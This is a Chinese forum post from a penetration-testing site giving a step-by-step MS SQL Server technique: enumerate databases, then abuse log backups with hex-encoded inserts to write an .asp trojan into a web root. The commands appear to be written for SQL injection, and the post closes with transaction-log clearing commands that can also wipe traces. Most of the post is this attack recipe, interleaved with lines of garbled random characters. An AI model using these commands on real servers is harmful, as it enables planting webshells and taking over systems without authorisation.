中国网络渗透测试联盟
标题:
差异备份提权
[打印本页]
作者:
admin
时间:
2012-9-15 14:38
标题:
差异备份提权
select * from master.dbo.sysdatabases 列出所有列的记录
. C8 w( F6 E$ d7 M
! o" v9 s# x! C
select name from master.dbo.sysdatabases 仅列出name列的记录
. k! [5 e7 I1 b- o. J4 V2 k
2 z" M/ c) N$ ^1 p3 u( q0 u& n. D; Y
注意:可以利用log和数据库备份两上都行,log备份不成功用数据库备份
6 c4 r& J6 L: n2 g% B3 i- i) d
" L. R! [+ `3 ~4 x' B5 c
alter database 数据库名 set RECOVERY FULL--
7 R; k9 f8 L: H7 L8 B1 \& j
# ]7 @$ Z( h" o/ P. ], V( D1 ^
create table cmd (a image)-- \**cmd是创建的临时表
& s1 B5 s Z# B- D$ s3 r
- u! m( ?+ k7 ~9 l
backup log 数据库名 to disk = 'f:\wwwroot\1.asp' with init--
( D$ `# B+ {) M3 Q: o y- x
7 w( [1 g% X& b0 J: R1 q8 B8 _
insert into cmd(a) values (0x130a0d0a663A5CCDF8D5BE5CCDF8CDA8C6F3D2B5425C626C75656B6973735C7765625C312E6173700d0a)--
" V8 |% p- l- H: \0 ~9 P
; m* J; S3 o5 A& x; Q, R
//木马存放路径(转换16进制0x130a0d0a替换原来0x最后添加0d0a要多加几个)
2 o) u6 y6 L& _3 {* Y n
, {$ z. o* W: i- W" L, J. m
backup log 数据库名 to disk = 'f:\wwwroot\1.asp'-- (要备份的目录)
% g/ P8 t4 y* L& h
) _ ?7 n$ Z1 w" {' d
drop table cmd--
; p" R( p/ A) G* y; E
" |3 ^3 k2 E2 C7 [+ R2 f; Q
$ @- R: Q3 H9 ~0 h
f:\
# Y, L5 {9 V- T7 u' G, ?2 q
16进制转换(0x130a0d0a663A5CCDF8D5BE5CCDF8CDA8C6F3D2B5425C626C75656B6973735C7765625C312E6173700d0a)
5 J! y9 q! p! E
- Z7 A, F" r2 u& z; Z" @& P
最好多加几个回车0d0a,要不会出错哈
2 x2 {1 p5 O3 t: d! K' O& t
- }. M+ Z" x. f0 j
1 _3 m, p x# Z2 O! L! v% Q
SQL Server日志清空方法
( K4 j' O1 H* K# z# q2 Z: ?
/ d. ]" M8 P& G2 o1 k; G2 f6 z
在查询分析器中顺序执行以下三步,其中 databasename 为你的数据库文件名
7 b2 G' q& d9 d
1.清空日志:DUMP TRANSACTION databasename WITH NO_LOG
. b/ r8 k3 x3 D% }2 L- I/ e
' n3 _% o& U+ y; n1 G
2.截断事务日志:BACKUP LOG databasename WITH NO_LOG
- q. M/ r1 K! n K, k, V
7 l B, Q2 t8 h! s% |
3.收缩数据库:DBCC SHRINKDATABASE(databasename)
& y f- Q# S! `2 V6 A3 \* [6 z% U5 s6 g
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2